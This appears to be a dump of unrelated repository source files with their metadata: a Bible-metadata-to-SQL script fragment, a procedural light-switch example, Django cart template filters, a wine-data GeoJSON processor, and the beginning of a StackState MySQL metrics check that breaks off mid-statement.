			'Hans', 'Hant', 'Java', 'Kore', 'Latn', 'Orya', 'Syrc', 'Taml', 'Thai' ]
		#if validScripts.index(script) < 0:
		if script in validScripts:
			a = 1
		else:
			# Map the long-form script names found in some files to codes.
			if script == 'Latin':
				script = 'Latn'
			elif script == 'Cyrillic':
				script = 'Cyrl'
			elif script == 'Arabic':
				script = 'Arab'
			elif script == 'Devangari':
				script = 'Deva'
			elif script == 'Devanagari (Nagari)':
				script = 'Deva'
			elif script == 'CJK':
				script = None
			else:
				print "ERROR: unknown script code", script, filename
		# Quote optional values for SQL, or emit the literal null keyword.
		script = "'" + script + "'" if script != None else 'null'
		country = bible.get('countryCode')
		country = "'" + country.upper() + "'" if len(country) > 0 else 'null'
		bucket = "dbp-prod"
		keyPrefix = filename.replace("info.json", "").replace(":", "/")
		s3Key = '%I_%O_%B_%C.html'
		out.write("%s ('%s', '%s', '%s', '%s', '%s', '%s', '%s', %s, %s, '%s', '%s', '%s', '%s');\n" %
			(prefix2, bibleId, code, abbr, iso3, name, englishName, direction, script, country, bucket, keyPrefix, s3Key, stylesheet))
out.close()
"gary@shortsands.com"
] | gary@shortsands.com |
686ec78309a16db8d1ce51f1a85347b62c062ac3 | 4016e9c2e766c012c760de375291cb33343e6048 | /Chapter_2/LightSwitch_Procedural.py | 88c28d142863f6ec8fc081e323fc88d87b2e03f7 | [
"BSD-2-Clause"
] | permissive | kapil87/Object-Oriented-Python-Code | 07d1609dc423b0d2ac8b0a1a86f57872b4fbf1ae | bd84b83896af0638131e95a014c29fe2e3a539b3 | refs/heads/master | 2023-07-31T20:22:40.222946 | 2021-09-10T17:45:13 | 2021-09-10T17:45:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 377 | py | # Procedural light switch
def turnOn():
    """Flip the shared module-level light switch to the on position."""
    global switchIsOn
    switchIsOn = True
def turnOff():
    """Flip the shared module-level light switch to the off position."""
    global switchIsOn
    switchIsOn = False
# Main code
switchIsOn = False # a global Boolean variable
# Test code
# Exercise the switch: toggle it and echo the state after each call.
print(switchIsOn)
turnOn()
print(switchIsOn)
turnOff()
print(switchIsOn)
turnOn()
print(switchIsOn)
| [
"Irv@furrypants.com"
] | Irv@furrypants.com |
227e887bea8fa47ad4def803c70e5cda59efe61b | 02f309da1333b018d466a6469199accd669e42f5 | /store/carts/templatetags/cart_extras.py | 2e1c859ebcaeefe7cadf109df70be07bb77c214d | [] | no_license | JesusGalindoB/django_project | 0dbfb3d802e847bb1f70d7aee4e34a75bce53391 | 29e047775d768ef8ec7ec16aa6f55ad5285d8667 | refs/heads/master | 2022-03-27T02:59:38.693824 | 2019-12-18T15:20:40 | 2019-12-18T15:20:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 387 | py | from django import template
register = template.Library()
@register.filter()
def quantity_product_format(quantity=1):
    """Template filter: render a quantity with its pluralized product noun."""
    noun = 'products' if quantity > 1 else 'product'
    return '{} {}'.format(quantity, noun)
@register.filter()
def quantity_add_format(quantity=1):
    """Template filter: render a quantity as '<n> product(s) aggregate(s)'."""
    suffix = 'aggregates' if quantity > 1 else 'aggregate'
    return '{} {}'.format(quantity_product_format(quantity), suffix)
| [
"jesbaga.17@gmail.com"
] | jesbaga.17@gmail.com |
8ef52ef102fe8b559bb374bf61e3765469efe340 | b08beebea7902f30518e115a1574f803bcde102a | /final_project/Q2_visualization/data_processing/dataProcessor.py | 95c775531e7d181566466a38357d5c2ead0f90ea | [] | no_license | niloofarmansoor/DataModelingAssignments | ffb48b2df216ce7c10706f3fbcca6e3d7317d55c | 8a30d82b4df29fcbe7c4aef32aec1f1ba1536d33 | refs/heads/main | 2023-04-08T00:36:50.716920 | 2021-04-09T20:10:45 | 2021-04-09T20:10:45 | 356,383,073 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,541 | py | #!/usr/bin/python
import json
import csv
import geojson
import tempfile
def removeDuplicate(array):
    """Return the items of *array* in first-seen order, duplicates dropped."""
    seen = set()
    unique = []
    for item in array:
        if item in seen:
            continue
        seen.add(item)
        unique.append(item)
    return unique
def getDataForCountry(country_name):
    """Aggregate wine statistics for one country from the wine-data CSV.

    Returns a dict with the wine count, a count per rating band, and the
    de-duplicated list of producers.  NOTE(review): uses Python 2 only
    str.decode('string_escape') - confirm this script runs under Python 2.
    """
    # Open the CSV file
    with open('../data/wine-data.csv', 'r') as csv_data_file:
        wine_data = csv.reader(csv_data_file, delimiter=',', quotechar='"')
        num_of_diff_wine = 0
        # 80-84 poor wine
        poor = 0
        # 84-88 fair wine
        fair = 0
        # 88-92 good wine
        good = 0
        # 92-96 very good wine
        very_good = 0
        # 96-100 excellent wine
        excellent = 0
        producers_list = []
        # Column 1 is the country, column 4 the score, column 10 the producer.
        for row in wine_data:
            if row[1] == country_name:
                num_of_diff_wine += 1
                #print row[10].decode('string_escape')
                producers_list.append(row[10].decode('string_escape'))
                # find the classification of the wine
                if 80 <= int(row[4]) < 84:
                    poor += 1
                if 84 <= int(row[4]) < 88:
                    fair += 1
                if 88 <= int(row[4]) < 92:
                    good += 1
                if 92 <= int(row[4]) < 96:
                    very_good += 1
                if 96 <= int(row[4]) <= 100:
                    excellent += 1
    producers = removeDuplicate(producers_list)
    # Create json object
    result = {'name': country_name, 'num_of_wines': num_of_diff_wine, 'poor_wine': poor, 'fair_wine': fair, 'good_wine': good,
              'veryGood_wine': very_good, 'excellent_wine': excellent, 'producers': producers}
    return result
def main():
    """Enrich each country feature of the world GeoJSON with wine stats."""
    with open('../data/world-countries.geojson') as geojson_data_file:
        data = geojson.load(geojson_data_file)
    objects = data['features']
    i = 0
    for obj in objects:
        try:
            country_name = obj['properties']['name']
            # The wine CSV abbreviates the United States as 'US'.
            if country_name == 'United States of America':
                country_name = 'US'
            country_data = getDataForCountry(country_name)
            obj['properties'] = country_data
        except Exception as error:
            # Best effort: a failing country is reported but skipped.
            print('Error happened: ', error)
    output_filename = 'outputFile.geojson'
    with open(output_filename, 'wb') as output_file:
        # output_file.write('{\n"type": "FeatureCollection",')
        json.dump(data, output_file, indent=2)


if __name__ == '__main__':
    main()
"niloofar@huskers.unl.edu"
] | niloofar@huskers.unl.edu |
ac6dfffda8359a168fb10d8fe398e4f8efbbc4ac | e38499956d46f771a143c9faa1492d17a3fb5854 | /mysql/stackstate_checks/mysql/mysql.py | ee3f1e0c47b718b38ab868b96a93161e02d919cb | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | StackVista/stackstate-agent-integrations | 959f83bc76d00c407f90f438032d03d4c072bc5d | 350cb6e239157b50b5943cdf5ca13163da9b9307 | refs/heads/master | 2023-07-20T03:51:47.814264 | 2023-07-11T09:13:28 | 2023-07-11T09:13:28 | 195,226,626 | 3 | 9 | BSD-3-Clause | 2023-08-29T08:10:51 | 2019-07-04T11:10:24 | Python | UTF-8 | Python | false | false | 70,607 | py | # (C) Datadog, Inc. 2018
# (C) Datadog, Inc. Patrick Galbraith <patg@patg.net> 2013
# All rights reserved
# Licensed under Simplified BSD License (see LICENSE)
from __future__ import division
import re
import traceback
from collections import defaultdict
from contextlib import closing, contextmanager
import pymysql
from six import PY3, iteritems, itervalues, text_type
try:
import psutil
PSUTIL_AVAILABLE = True
except ImportError:
PSUTIL_AVAILABLE = False
from stackstate_checks.base import AgentCheck, is_affirmative, TopologyInstance
# Python 3 has no `long`; alias it so `long(0)` comparisons keep working.
if PY3:
    long = int
# Metric submission types: the second element of every (metric_name, type)
# pair in the *_VARS dictionaries below.
GAUGE = "gauge"
RATE = "rate"
COUNT = "count"
MONOTONIC = "monotonic_count"
# Process name scanned for when locating a local server via psutil.
PROC_NAME = 'mysqld'
# Vars found in "SHOW STATUS;"
STATUS_VARS = {
    # Command Metrics
    'Slow_queries': ('mysql.performance.slow_queries', RATE),
    'Questions': ('mysql.performance.questions', RATE),
    'Queries': ('mysql.performance.queries', RATE),
    'Com_select': ('mysql.performance.com_select', RATE),
    'Com_insert': ('mysql.performance.com_insert', RATE),
    'Com_update': ('mysql.performance.com_update', RATE),
    'Com_delete': ('mysql.performance.com_delete', RATE),
    'Com_replace': ('mysql.performance.com_replace', RATE),
    'Com_load': ('mysql.performance.com_load', RATE),
    'Com_insert_select': ('mysql.performance.com_insert_select', RATE),
    'Com_update_multi': ('mysql.performance.com_update_multi', RATE),
    'Com_delete_multi': ('mysql.performance.com_delete_multi', RATE),
    'Com_replace_select': ('mysql.performance.com_replace_select', RATE),
    # Connection Metrics
    'Connections': ('mysql.net.connections', RATE),
    'Max_used_connections': ('mysql.net.max_connections', GAUGE),
    'Aborted_clients': ('mysql.net.aborted_clients', RATE),
    'Aborted_connects': ('mysql.net.aborted_connects', RATE),
    # Table Cache Metrics
    'Open_files': ('mysql.performance.open_files', GAUGE),
    'Open_tables': ('mysql.performance.open_tables', GAUGE),
    # Network Metrics
    'Bytes_sent': ('mysql.performance.bytes_sent', RATE),
    'Bytes_received': ('mysql.performance.bytes_received', RATE),
    # Query Cache Metrics
    'Qcache_hits': ('mysql.performance.qcache_hits', RATE),
    'Qcache_inserts': ('mysql.performance.qcache_inserts', RATE),
    'Qcache_lowmem_prunes': ('mysql.performance.qcache_lowmem_prunes', RATE),
    # Table Lock Metrics
    'Table_locks_waited': ('mysql.performance.table_locks_waited', GAUGE),
    'Table_locks_waited_rate': ('mysql.performance.table_locks_waited.rate', RATE),
    # Temporary Table Metrics
    'Created_tmp_tables': ('mysql.performance.created_tmp_tables', RATE),
    'Created_tmp_disk_tables': ('mysql.performance.created_tmp_disk_tables', RATE),
    'Created_tmp_files': ('mysql.performance.created_tmp_files', RATE),
    # Thread Metrics
    'Threads_connected': ('mysql.performance.threads_connected', GAUGE),
    'Threads_running': ('mysql.performance.threads_running', GAUGE),
    # MyISAM Metrics
    'Key_buffer_bytes_unflushed': ('mysql.myisam.key_buffer_bytes_unflushed', GAUGE),
    'Key_buffer_bytes_used': ('mysql.myisam.key_buffer_bytes_used', GAUGE),
    'Key_read_requests': ('mysql.myisam.key_read_requests', RATE),
    'Key_reads': ('mysql.myisam.key_reads', RATE),
    'Key_write_requests': ('mysql.myisam.key_write_requests', RATE),
    'Key_writes': ('mysql.myisam.key_writes', RATE),
}
# Possibly from SHOW GLOBAL VARIABLES
VARIABLES_VARS = {
    'Key_buffer_size': ('mysql.myisam.key_buffer_size', GAUGE),
    'Key_cache_utilization': ('mysql.performance.key_cache_utilization', GAUGE),
    'max_connections': ('mysql.net.max_connections_available', GAUGE),
    'query_cache_size': ('mysql.performance.qcache_size', GAUGE),
    'table_open_cache': ('mysql.performance.table_open_cache', GAUGE),
    'thread_cache_size': ('mysql.performance.thread_cache_size', GAUGE)
}
INNODB_VARS = {
    # InnoDB metrics
    'Innodb_data_reads': ('mysql.innodb.data_reads', RATE),
    'Innodb_data_writes': ('mysql.innodb.data_writes', RATE),
    'Innodb_os_log_fsyncs': ('mysql.innodb.os_log_fsyncs', RATE),
    'Innodb_mutex_spin_waits': ('mysql.innodb.mutex_spin_waits', RATE),
    'Innodb_mutex_spin_rounds': ('mysql.innodb.mutex_spin_rounds', RATE),
    'Innodb_mutex_os_waits': ('mysql.innodb.mutex_os_waits', RATE),
    'Innodb_row_lock_waits': ('mysql.innodb.row_lock_waits', RATE),
    'Innodb_row_lock_time': ('mysql.innodb.row_lock_time', RATE),
    'Innodb_row_lock_current_waits': ('mysql.innodb.row_lock_current_waits', GAUGE),
    'Innodb_current_row_locks': ('mysql.innodb.current_row_locks', GAUGE),
    'Innodb_buffer_pool_bytes_dirty': ('mysql.innodb.buffer_pool_dirty', GAUGE),
    'Innodb_buffer_pool_bytes_free': ('mysql.innodb.buffer_pool_free', GAUGE),
    'Innodb_buffer_pool_bytes_used': ('mysql.innodb.buffer_pool_used', GAUGE),
    'Innodb_buffer_pool_bytes_total': ('mysql.innodb.buffer_pool_total', GAUGE),
    'Innodb_buffer_pool_read_requests': ('mysql.innodb.buffer_pool_read_requests', RATE),
    'Innodb_buffer_pool_reads': ('mysql.innodb.buffer_pool_reads', RATE),
    'Innodb_buffer_pool_pages_utilization': ('mysql.innodb.buffer_pool_utilization', GAUGE),
}
# Calculated from "SHOW MASTER LOGS;"
BINLOG_VARS = {
    'Binlog_space_usage_bytes': ('mysql.binlog.disk_use', GAUGE),
}
# Additional Vars found in "SHOW STATUS;"
# Will collect if [FLAG NAME] is True
OPTIONAL_STATUS_VARS = {
    'Binlog_cache_disk_use': ('mysql.binlog.cache_disk_use', GAUGE),
    'Binlog_cache_use': ('mysql.binlog.cache_use', GAUGE),
    'Handler_commit': ('mysql.performance.handler_commit', RATE),
    'Handler_delete': ('mysql.performance.handler_delete', RATE),
    'Handler_prepare': ('mysql.performance.handler_prepare', RATE),
    'Handler_read_first': ('mysql.performance.handler_read_first', RATE),
    'Handler_read_key': ('mysql.performance.handler_read_key', RATE),
    'Handler_read_next': ('mysql.performance.handler_read_next', RATE),
    'Handler_read_prev': ('mysql.performance.handler_read_prev', RATE),
    'Handler_read_rnd': ('mysql.performance.handler_read_rnd', RATE),
    'Handler_read_rnd_next': ('mysql.performance.handler_read_rnd_next', RATE),
    'Handler_rollback': ('mysql.performance.handler_rollback', RATE),
    'Handler_update': ('mysql.performance.handler_update', RATE),
    'Handler_write': ('mysql.performance.handler_write', RATE),
    'Opened_tables': ('mysql.performance.opened_tables', RATE),
    'Qcache_total_blocks': ('mysql.performance.qcache_total_blocks', GAUGE),
    'Qcache_free_blocks': ('mysql.performance.qcache_free_blocks', GAUGE),
    'Qcache_free_memory': ('mysql.performance.qcache_free_memory', GAUGE),
    'Qcache_not_cached': ('mysql.performance.qcache_not_cached', RATE),
    'Qcache_queries_in_cache': ('mysql.performance.qcache_queries_in_cache', GAUGE),
    'Select_full_join': ('mysql.performance.select_full_join', RATE),
    'Select_full_range_join': ('mysql.performance.select_full_range_join', RATE),
    'Select_range': ('mysql.performance.select_range', RATE),
    'Select_range_check': ('mysql.performance.select_range_check', RATE),
    'Select_scan': ('mysql.performance.select_scan', RATE),
    'Sort_merge_passes': ('mysql.performance.sort_merge_passes', RATE),
    'Sort_range': ('mysql.performance.sort_range', RATE),
    'Sort_rows': ('mysql.performance.sort_rows', RATE),
    'Sort_scan': ('mysql.performance.sort_scan', RATE),
    'Table_locks_immediate': ('mysql.performance.table_locks_immediate', GAUGE),
    'Table_locks_immediate_rate': ('mysql.performance.table_locks_immediate.rate', RATE),
    'Threads_cached': ('mysql.performance.threads_cached', GAUGE),
    'Threads_created': ('mysql.performance.threads_created', MONOTONIC)
}
# Status Vars added in Mysql 5.6.6
OPTIONAL_STATUS_VARS_5_6_6 = {
    'Table_open_cache_hits': ('mysql.performance.table_cache_hits', RATE),
    'Table_open_cache_misses': ('mysql.performance.table_cache_misses', RATE),
}
# Will collect if [extra_innodb_metrics] is True
OPTIONAL_INNODB_VARS = {
    'Innodb_active_transactions': ('mysql.innodb.active_transactions', GAUGE),
    'Innodb_buffer_pool_bytes_data': ('mysql.innodb.buffer_pool_data', GAUGE),
    'Innodb_buffer_pool_pages_data': ('mysql.innodb.buffer_pool_pages_data', GAUGE),
    'Innodb_buffer_pool_pages_dirty': ('mysql.innodb.buffer_pool_pages_dirty', GAUGE),
    'Innodb_buffer_pool_pages_flushed': ('mysql.innodb.buffer_pool_pages_flushed', RATE),
    'Innodb_buffer_pool_pages_free': ('mysql.innodb.buffer_pool_pages_free', GAUGE),
    'Innodb_buffer_pool_pages_total': ('mysql.innodb.buffer_pool_pages_total', GAUGE),
    'Innodb_buffer_pool_read_ahead': ('mysql.innodb.buffer_pool_read_ahead', RATE),
    'Innodb_buffer_pool_read_ahead_evicted': ('mysql.innodb.buffer_pool_read_ahead_evicted', RATE),
    'Innodb_buffer_pool_read_ahead_rnd': ('mysql.innodb.buffer_pool_read_ahead_rnd', GAUGE),
    'Innodb_buffer_pool_wait_free': ('mysql.innodb.buffer_pool_wait_free', MONOTONIC),
    'Innodb_buffer_pool_write_requests': ('mysql.innodb.buffer_pool_write_requests', RATE),
    'Innodb_checkpoint_age': ('mysql.innodb.checkpoint_age', GAUGE),
    'Innodb_current_transactions': ('mysql.innodb.current_transactions', GAUGE),
    'Innodb_data_fsyncs': ('mysql.innodb.data_fsyncs', RATE),
    'Innodb_data_pending_fsyncs': ('mysql.innodb.data_pending_fsyncs', GAUGE),
    'Innodb_data_pending_reads': ('mysql.innodb.data_pending_reads', GAUGE),
    'Innodb_data_pending_writes': ('mysql.innodb.data_pending_writes', GAUGE),
    'Innodb_data_read': ('mysql.innodb.data_read', RATE),
    'Innodb_data_written': ('mysql.innodb.data_written', RATE),
    'Innodb_dblwr_pages_written': ('mysql.innodb.dblwr_pages_written', RATE),
    'Innodb_dblwr_writes': ('mysql.innodb.dblwr_writes', RATE),
    'Innodb_hash_index_cells_total': ('mysql.innodb.hash_index_cells_total', GAUGE),
    'Innodb_hash_index_cells_used': ('mysql.innodb.hash_index_cells_used', GAUGE),
    'Innodb_history_list_length': ('mysql.innodb.history_list_length', GAUGE),
    'Innodb_ibuf_free_list': ('mysql.innodb.ibuf_free_list', GAUGE),
    'Innodb_ibuf_merged': ('mysql.innodb.ibuf_merged', RATE),
    'Innodb_ibuf_merged_delete_marks': ('mysql.innodb.ibuf_merged_delete_marks', RATE),
    'Innodb_ibuf_merged_deletes': ('mysql.innodb.ibuf_merged_deletes', RATE),
    'Innodb_ibuf_merged_inserts': ('mysql.innodb.ibuf_merged_inserts', RATE),
    'Innodb_ibuf_merges': ('mysql.innodb.ibuf_merges', RATE),
    'Innodb_ibuf_segment_size': ('mysql.innodb.ibuf_segment_size', GAUGE),
    'Innodb_ibuf_size': ('mysql.innodb.ibuf_size', GAUGE),
    'Innodb_lock_structs': ('mysql.innodb.lock_structs', RATE),
    'Innodb_locked_tables': ('mysql.innodb.locked_tables', GAUGE),
    'Innodb_locked_transactions': ('mysql.innodb.locked_transactions', GAUGE),
    'Innodb_log_waits': ('mysql.innodb.log_waits', RATE),
    'Innodb_log_write_requests': ('mysql.innodb.log_write_requests', RATE),
    'Innodb_log_writes': ('mysql.innodb.log_writes', RATE),
    'Innodb_lsn_current': ('mysql.innodb.lsn_current', RATE),
    'Innodb_lsn_flushed': ('mysql.innodb.lsn_flushed', RATE),
    'Innodb_lsn_last_checkpoint': ('mysql.innodb.lsn_last_checkpoint', RATE),
    'Innodb_mem_adaptive_hash': ('mysql.innodb.mem_adaptive_hash', GAUGE),
    'Innodb_mem_additional_pool': ('mysql.innodb.mem_additional_pool', GAUGE),
    'Innodb_mem_dictionary': ('mysql.innodb.mem_dictionary', GAUGE),
    'Innodb_mem_file_system': ('mysql.innodb.mem_file_system', GAUGE),
    'Innodb_mem_lock_system': ('mysql.innodb.mem_lock_system', GAUGE),
    'Innodb_mem_page_hash': ('mysql.innodb.mem_page_hash', GAUGE),
    'Innodb_mem_recovery_system': ('mysql.innodb.mem_recovery_system', GAUGE),
    'Innodb_mem_thread_hash': ('mysql.innodb.mem_thread_hash', GAUGE),
    'Innodb_mem_total': ('mysql.innodb.mem_total', GAUGE),
    'Innodb_os_file_fsyncs': ('mysql.innodb.os_file_fsyncs', RATE),
    'Innodb_os_file_reads': ('mysql.innodb.os_file_reads', RATE),
    'Innodb_os_file_writes': ('mysql.innodb.os_file_writes', RATE),
    'Innodb_os_log_pending_fsyncs': ('mysql.innodb.os_log_pending_fsyncs', GAUGE),
    'Innodb_os_log_pending_writes': ('mysql.innodb.os_log_pending_writes', GAUGE),
    'Innodb_os_log_written': ('mysql.innodb.os_log_written', RATE),
    'Innodb_pages_created': ('mysql.innodb.pages_created', RATE),
    'Innodb_pages_read': ('mysql.innodb.pages_read', RATE),
    'Innodb_pages_written': ('mysql.innodb.pages_written', RATE),
    'Innodb_pending_aio_log_ios': ('mysql.innodb.pending_aio_log_ios', GAUGE),
    'Innodb_pending_aio_sync_ios': ('mysql.innodb.pending_aio_sync_ios', GAUGE),
    'Innodb_pending_buffer_pool_flushes': ('mysql.innodb.pending_buffer_pool_flushes', GAUGE),
    'Innodb_pending_checkpoint_writes': ('mysql.innodb.pending_checkpoint_writes', GAUGE),
    'Innodb_pending_ibuf_aio_reads': ('mysql.innodb.pending_ibuf_aio_reads', GAUGE),
    'Innodb_pending_log_flushes': ('mysql.innodb.pending_log_flushes', GAUGE),
    'Innodb_pending_log_writes': ('mysql.innodb.pending_log_writes', GAUGE),
    'Innodb_pending_normal_aio_reads': ('mysql.innodb.pending_normal_aio_reads', GAUGE),
    'Innodb_pending_normal_aio_writes': ('mysql.innodb.pending_normal_aio_writes', GAUGE),
    'Innodb_queries_inside': ('mysql.innodb.queries_inside', GAUGE),
    'Innodb_queries_queued': ('mysql.innodb.queries_queued', GAUGE),
    'Innodb_read_views': ('mysql.innodb.read_views', GAUGE),
    'Innodb_rows_deleted': ('mysql.innodb.rows_deleted', RATE),
    'Innodb_rows_inserted': ('mysql.innodb.rows_inserted', RATE),
    'Innodb_rows_read': ('mysql.innodb.rows_read', RATE),
    'Innodb_rows_updated': ('mysql.innodb.rows_updated', RATE),
    'Innodb_s_lock_os_waits': ('mysql.innodb.s_lock_os_waits', RATE),
    'Innodb_s_lock_spin_rounds': ('mysql.innodb.s_lock_spin_rounds', RATE),
    'Innodb_s_lock_spin_waits': ('mysql.innodb.s_lock_spin_waits', RATE),
    'Innodb_semaphore_wait_time': ('mysql.innodb.semaphore_wait_time', GAUGE),
    'Innodb_semaphore_waits': ('mysql.innodb.semaphore_waits', GAUGE),
    'Innodb_tables_in_use': ('mysql.innodb.tables_in_use', GAUGE),
    'Innodb_x_lock_os_waits': ('mysql.innodb.x_lock_os_waits', RATE),
    'Innodb_x_lock_spin_rounds': ('mysql.innodb.x_lock_spin_rounds', RATE),
    'Innodb_x_lock_spin_waits': ('mysql.innodb.x_lock_spin_waits', RATE),
}
# Galera cluster health vars, present in SHOW STATUS when [galera_cluster] is True.
GALERA_VARS = {
    'wsrep_cluster_size': ('mysql.galera.wsrep_cluster_size', GAUGE),
    'wsrep_local_recv_queue_avg': ('mysql.galera.wsrep_local_recv_queue_avg', GAUGE),
    'wsrep_flow_control_paused': ('mysql.galera.wsrep_flow_control_paused', GAUGE),
    'wsrep_cert_deps_distance': ('mysql.galera.wsrep_cert_deps_distance', GAUGE),
    'wsrep_local_send_queue_avg': ('mysql.galera.wsrep_local_send_queue_avg', GAUGE),
}
# Computed from the performance_schema when [extra_performance_metrics] is True.
PERFORMANCE_VARS = {
    'query_run_time_avg': ('mysql.performance.query_run_time.avg', GAUGE),
    'perf_digest_95th_percentile_avg_us': ('mysql.performance.digest_95th_percentile.avg_us', GAUGE),
}
# Computed from information_schema when [schema_size_metrics] is True.
SCHEMA_VARS = {
    'information_schema_size': ('mysql.info.schema.size', GAUGE),
}
# Replication metrics, collected when [replication] is True.
REPLICA_VARS = {
    'Seconds_Behind_Master': ('mysql.replication.seconds_behind_master', GAUGE),
    'Slaves_connected': ('mysql.replication.slaves_connected', GAUGE),
}
# Derived metrics computed by the check itself (see _compute_synthetic_results).
SYNTHETIC_VARS = {
    'Qcache_utilization': ('mysql.performance.qcache.utilization', GAUGE),
    'Qcache_instant_utilization': ('mysql.performance.qcache.utilization.instant', GAUGE),
}
class MySql(AgentCheck):
SERVICE_CHECK_NAME = 'mysql.can_connect'
SLAVE_SERVICE_CHECK_NAME = 'mysql.replication.slave_running'
DEFAULT_MAX_CUSTOM_QUERIES = 20
    def __init__(self, name, init_config, agentConfig, instances=None):
        """Initialize the check and the per-host caches reused across runs."""
        AgentCheck.__init__(self, name, init_config, agentConfig, instances)
        # Host key -> parsed server version, so VERSION() is queried only once.
        self.mysql_version = {}
        # Host key -> (hits, inserts, not_cached) from the previous run,
        # used to compute instantaneous query-cache utilization.
        self.qcache_stats = {}
@classmethod
def get_library_versions(cls):
return {'pymysql': pymysql.__version__}
    def get_instance_key(self, instance):
        # All MySQL instances report topology under a single shared
        # "mysql" source instance.
        return TopologyInstance("mysql", "mysql://mysql")
def check(self, instance):
host, port, user, password, mysql_sock, \
defaults_file, tags, options, queries, ssl, \
connect_timeout, max_custom_queries = \
self._get_config(instance)
self._set_qcache_stats()
if not (host and user) and not defaults_file:
raise Exception("Mysql host and user are needed.")
with self._connect(host, port, mysql_sock, user,
password, defaults_file, ssl, connect_timeout, tags) as db:
try:
# Metadata collection
self._collect_metadata(db)
# Metric collection
self._collect_metrics(db, tags, options, queries, max_custom_queries)
self._collect_system_metrics(host, db, tags)
# keeping track of these:
self._put_qcache_stats()
# Topology
self._collect_topology(host, db)
except Exception as e:
self.log.exception("error!")
raise e
    def _get_config(self, instance):
        """Parse one instance's YAML config.

        Returns a tuple of every connection/collection setting the check
        needs. Host, port, socket and defaults_file are also stored on
        self because other helpers (_get_host_key, topology) reuse them.
        """
        self.host = instance.get('server', '')
        self.port = int(instance.get('port', 0))
        self.mysql_sock = instance.get('sock', '')
        self.defaults_file = instance.get('defaults_file', '')
        user = instance.get('user', '')
        password = str(instance.get('pass', ''))
        tags = instance.get('tags', [])
        options = instance.get('options', {}) or {}  # options could be None if empty in the YAML
        queries = instance.get('queries', [])
        ssl = instance.get('ssl', {})
        connect_timeout = instance.get('connect_timeout', 10)
        max_custom_queries = instance.get('max_custom_queries', self.DEFAULT_MAX_CUSTOM_QUERIES)
        return (self.host, self.port, user, password, self.mysql_sock,
                self.defaults_file, tags, options, queries, ssl, connect_timeout, max_custom_queries)
    def _get_topology_hostname(self, host, port):
        # Use the agent hostname for local host, otherwise use the remote hostname
        return self.hostname if self._is_localhost(host, port) else host
def _collect_topology(self, host, db):
self.component(self._get_topology_hostname(host, db), "mysql", {})
def _set_qcache_stats(self):
host_key = self._get_host_key()
qcache_st = self.qcache_stats.get(host_key, (None, None, None))
self._qcache_hits = qcache_st[0]
self._qcache_inserts = qcache_st[1]
self._qcache_not_cached = qcache_st[2]
def _put_qcache_stats(self):
host_key = self._get_host_key()
self.qcache_stats[host_key] = (
self._qcache_hits,
self._qcache_inserts,
self._qcache_not_cached
)
def _get_host_key(self):
if self.defaults_file:
return self.defaults_file
hostkey = self.host
if self.mysql_sock:
hostkey = "{0}:{1}".format(hostkey, self.mysql_sock)
elif self.port:
hostkey = "{0}:{1}".format(hostkey, self.port)
return hostkey
    @contextmanager
    def _connect(self, host, port, mysql_sock, user, password, defaults_file, ssl, connect_timeout, tags):
        """Yield an open pymysql connection, emitting the can_connect
        service check (OK on success, CRITICAL on any failure) and always
        closing the connection afterwards.

        Connection source precedence: defaults_file > unix socket > host:port.
        """
        self.service_check_tags = [
            'server:%s' % (mysql_sock if mysql_sock != '' else host),
            'port:%s' % ('unix_socket' if port == 0 else port)
        ]
        if tags is not None:
            self.service_check_tags.extend(tags)
        db = None
        try:
            # pymysql expects a dict (or None) for ssl; normalize falsy values.
            ssl = dict(ssl) if ssl else None
            if defaults_file != '':
                db = pymysql.connect(
                    read_default_file=defaults_file,
                    ssl=ssl,
                    connect_timeout=connect_timeout
                )
            elif mysql_sock != '':
                # NOTE(review): `+ tags` would raise TypeError if tags is None
                # here; callers currently always pass a list — verify before
                # relying on this branch with a None tags value.
                self.service_check_tags = [
                    'server:{0}'.format(mysql_sock),
                    'port:unix_socket'
                ] + tags
                db = pymysql.connect(
                    unix_socket=mysql_sock,
                    user=user,
                    passwd=password,
                    connect_timeout=connect_timeout
                )
            elif port:
                db = pymysql.connect(
                    host=host,
                    port=port,
                    user=user,
                    passwd=password,
                    ssl=ssl,
                    connect_timeout=connect_timeout
                )
            else:
                db = pymysql.connect(
                    host=host,
                    user=user,
                    passwd=password,
                    ssl=ssl,
                    connect_timeout=connect_timeout
                )
            self.log.debug("Connected to MySQL")
            # Deduplicate tags before emitting the service check.
            self.service_check_tags = list(set(self.service_check_tags))
            self.service_check(self.SERVICE_CHECK_NAME, AgentCheck.OK,
                               tags=self.service_check_tags)
            yield db
        except Exception:
            self.service_check(self.SERVICE_CHECK_NAME, AgentCheck.CRITICAL,
                               tags=self.service_check_tags)
            raise
        finally:
            if db:
                db.close()
def _collect_metrics(self, db, tags, options, queries, max_custom_queries):
# Get aggregate of all VARS we want to collect
metrics = STATUS_VARS
# collect results from db
results = self._get_stats_from_status(db)
results.update(self._get_stats_from_variables(db))
if not is_affirmative(options.get('disable_innodb_metrics', False)) and self._is_innodb_engine_enabled(db):
results.update(self._get_stats_from_innodb_status(db))
innodb_keys = [
'Innodb_page_size',
'Innodb_buffer_pool_pages_data',
'Innodb_buffer_pool_pages_dirty',
'Innodb_buffer_pool_pages_total',
'Innodb_buffer_pool_pages_free',
]
for inno_k in innodb_keys:
results[inno_k] = self._collect_scalar(inno_k, results)
try:
innodb_page_size = results['Innodb_page_size']
innodb_buffer_pool_pages_used = results['Innodb_buffer_pool_pages_total'] - \
results['Innodb_buffer_pool_pages_free']
if 'Innodb_buffer_pool_bytes_data' not in results:
results[
'Innodb_buffer_pool_bytes_data'] = results['Innodb_buffer_pool_pages_data'] * innodb_page_size
if 'Innodb_buffer_pool_bytes_dirty' not in results:
results[
'Innodb_buffer_pool_bytes_dirty'] = results['Innodb_buffer_pool_pages_dirty'] * innodb_page_size
if 'Innodb_buffer_pool_bytes_free' not in results:
results[
'Innodb_buffer_pool_bytes_free'] = results['Innodb_buffer_pool_pages_free'] * innodb_page_size
if 'Innodb_buffer_pool_bytes_total' not in results:
results[
'Innodb_buffer_pool_bytes_total'] = results['Innodb_buffer_pool_pages_total'] * innodb_page_size
if 'Innodb_buffer_pool_pages_utilization' not in results:
results['Innodb_buffer_pool_pages_utilization'] = innodb_buffer_pool_pages_used / \
results['Innodb_buffer_pool_pages_total']
if 'Innodb_buffer_pool_bytes_used' not in results:
results[
